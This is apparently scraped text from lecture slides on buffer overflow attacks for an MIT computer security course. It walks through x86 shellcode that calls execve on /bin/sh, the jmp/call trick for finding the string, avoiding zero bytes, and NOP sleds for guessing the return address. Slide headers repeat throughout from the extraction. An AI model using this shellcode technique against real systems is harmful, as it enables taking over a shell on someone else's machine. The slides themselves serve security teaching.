mov 0x8(%ebp),%ebxmov 0xc(%ebp),%ecxmov 0x10(%ebp),%edxmov $0xb,%eaxint $0x80
ebx
ecx
edx
0x80884a8
0xfffffff8
![Page 50: Buffer Overflow Attacks](https://reader035.vdocuments.net/reader035/viewer/2022062221/568144cc550346895db196ff/html5/thumbnails/50.jpg)
Running Evil Code…
50
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
ret
sfpfp (ebp)
movl string_addr,0x8 movl $0x0,0xc movl $0xb,%eax movl string_addr,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80
movl string_addr,0x8 movl $0x0,0xc movl $0xb,%eax movl string_addr,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80
![Page 51: Buffer Overflow Attacks](https://reader035.vdocuments.net/reader035/viewer/2022062221/568144cc550346895db196ff/html5/thumbnails/51.jpg)
Running Evil Code…
51
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
ret
sfpfp (ebp)
movl string_addr,0x8 movl $0x0,0xc movl $0xb,%eax movl string_addr,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80
movl string_addr,0x8 movl $0x0,0xc movl $0xb,%eax movl string_addr,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80
string_addr
NULLecxebx
edx
0x8
![Page 52: Buffer Overflow Attacks](https://reader035.vdocuments.net/reader035/viewer/2022062221/568144cc550346895db196ff/html5/thumbnails/52.jpg)
Running Evil Code…
52
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
ret
sfp
movl string_addr,0x8 movl $0x0,0xc movl $0xb,%eax movl string_addr,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80
movl string_addr,0x8 movl $0x0,0xc movl $0xb,%eax movl string_addr,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80
string_addr
NULL
??????
![Page 53: Buffer Overflow Attacks](https://reader035.vdocuments.net/reader035/viewer/2022062221/568144cc550346895db196ff/html5/thumbnails/53.jpg)
Running Evil Code…
53
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
ret
sfp
jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string
jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string
![Page 54: Buffer Overflow Attacks](https://reader035.vdocuments.net/reader035/viewer/2022062221/568144cc550346895db196ff/html5/thumbnails/54.jpg)
Running Evil Code…
54
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
ret
sfp
jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string
jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string
“bin/sh”
code
![Page 55: Buffer Overflow Attacks](https://reader035.vdocuments.net/reader035/viewer/2022062221/568144cc550346895db196ff/html5/thumbnails/55.jpg)
Running Evil Code…
55
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
ret
sfp
jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string
jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string
“bin/sh”
code
![Page 56: Buffer Overflow Attacks](https://reader035.vdocuments.net/reader035/viewer/2022062221/568144cc550346895db196ff/html5/thumbnails/56.jpg)
Running Evil Code…
56
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
ret
sfp
jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string
jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string
“bin/sh”
code
addr of “bin/sh”
![Page 57: Buffer Overflow Attacks](https://reader035.vdocuments.net/reader035/viewer/2022062221/568144cc550346895db196ff/html5/thumbnails/57.jpg)
Running Evil Code…
57
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
ret
sfp
jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string
jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string
“bin/sh”
code
addr of “bin/sh” esi
![Page 58: Buffer Overflow Attacks](https://reader035.vdocuments.net/reader035/viewer/2022062221/568144cc550346895db196ff/html5/thumbnails/58.jpg)
Running Evil Code…
58
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
ret
sfp
jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string
jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string
“bin/sh”
code
![Page 59: Buffer Overflow Attacks](https://reader035.vdocuments.net/reader035/viewer/2022062221/568144cc550346895db196ff/html5/thumbnails/59.jpg)
Running Evil Code…
59
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
ret
sfp
jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string
jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string
Obstacle #1: Zero Bytes
![Page 60: Buffer Overflow Attacks](https://reader035.vdocuments.net/reader035/viewer/2022062221/568144cc550346895db196ff/html5/thumbnails/60.jpg)
Running Evil Code…
60
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
ret
sfp
jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string
jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string
Obstacle #1: Zero BytesSolution: Generate on the fly(e.g., push $0x0 = xor %eax, %eax push %eax)
![Page 61: Buffer Overflow Attacks](https://reader035.vdocuments.net/reader035/viewer/2022062221/568144cc550346895db196ff/html5/thumbnails/61.jpg)
Running Evil Code…
61
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
ret
sfp
jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string
jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string
Obstacle #2: Guessing the Return Address
code
ret’ret’ret’ret’ret’ret’
![Page 62: Buffer Overflow Attacks](https://reader035.vdocuments.net/reader035/viewer/2022062221/568144cc550346895db196ff/html5/thumbnails/62.jpg)
Running Evil Code…
62
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
ret
sfp
jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string
jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string
Obstacle #2: Guessing the Return Address
code
ret’ret’ret’ret’ret’ret’
![Page 63: Buffer Overflow Attacks](https://reader035.vdocuments.net/reader035/viewer/2022062221/568144cc550346895db196ff/html5/thumbnails/63.jpg)
Running Evil Code…
63
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
ret
sfp
jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string
jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string
Obstacle #2: Guessing the Return Address
code
ret’ret’ret’ret’ret’ret’
![Page 64: Buffer Overflow Attacks](https://reader035.vdocuments.net/reader035/viewer/2022062221/568144cc550346895db196ff/html5/thumbnails/64.jpg)
Running Evil Code…
64
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
ret
sfp
jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string
jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string
Obstacle #2: Guessing the Return AddressSolution: Add a NOP landing pad to increase the chance that your guess is right.
code
ret’ret’ret’ret’ret’ret’
nopnopnop
![Page 65: Buffer Overflow Attacks](https://reader035.vdocuments.net/reader035/viewer/2022062221/568144cc550346895db196ff/html5/thumbnails/65.jpg)
Running Evil Code…
65
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
ret
sfp
jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string
jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string
Obstacle #2: Guessing the Return AddressSolution: Add a NOP landing pad to increase the chance that your guess is right.
code
ret’ret’ret’ret’ret’ret’
nopnopnop
![Page 66: Buffer Overflow Attacks](https://reader035.vdocuments.net/reader035/viewer/2022062221/568144cc550346895db196ff/html5/thumbnails/66.jpg)
Running Evil Code…
66
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
ret
sfp
jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string
jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string
Obstacle #2: Guessing the Return AddressSolution: Add a NOP landing pad to increase the chance that your guess is right.
code
ret’ret’ret’ret’ret’ret’
nopnopnop
![Page 67: Buffer Overflow Attacks](https://reader035.vdocuments.net/reader035/viewer/2022062221/568144cc550346895db196ff/html5/thumbnails/67.jpg)
Running Evil Code…
67
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
ret
sfp
jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string
jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string
Obstacle #2: Guessing the Return AddressSolution: Add a NOP landing pad to increase the chance that your guess is right.
code
ret’ret’ret’ret’ret’ret’
nopnopnop